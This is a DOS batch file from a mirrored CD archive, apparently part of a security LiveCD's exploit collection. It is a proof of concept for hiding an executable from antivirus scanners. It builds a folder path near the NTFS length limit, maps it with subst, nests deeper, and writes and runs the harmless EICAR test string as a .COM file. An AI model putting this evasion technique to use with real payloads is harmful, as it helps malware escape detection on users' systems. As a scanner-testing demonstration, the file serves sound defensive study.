home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / ntfs-hide.bat < prev    next >
DOS Batch File  |  2005-02-12  |  2KB  |  44 lines

  1. @echo off
  2. cls
  3. echo Start test-script NTFS-limit
  4. @echo Create a filepath to the limit of NTFS
  5. md 
  6. c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
  7. \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
  8. 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
  9. 123456789
  10. cd 
  11. c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
  12. \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
  13. 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
  14. 123456789
  15. @echo Create the Eicar test-string for PoC. This should be detected normally if you 
  16. have an active virusscanner.
  17. echo 
  18. X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  19. >EICAR.TXT
  20. echo. >>EICAR.TXT
  21. @echo Activate the Eicar test-string
  22. copy EICAR.TXT EICAR1.COM >NUL
  23. @echo Create a subst-drive Q: for this path
  24. subst Q: 
  25. c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
  26. \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
  27. 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
  28. 123456789
  29. @echo Create e even deeper filepath (thus exceeding the limit of NTFS's explorer)
  30. md Q:\1234567890\1234567890\1234567890
  31. @echo Change current folder into "the deep"
  32. Q:
  33. cd Q:\1234567890\1234567890\1234567890
  34. @echo Create the Eicar test-string
  35. echo 
  36. X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
  37. >EICAR.TXT
  38. echo. >>EICAR.TXT
  39. @echo Activate the Eicar test-string
  40. copy EICAR.TXT EICAR2.COM >NUL
  41. EICAR2.COM
  42. echo .
  43. echo End of test-script
  44.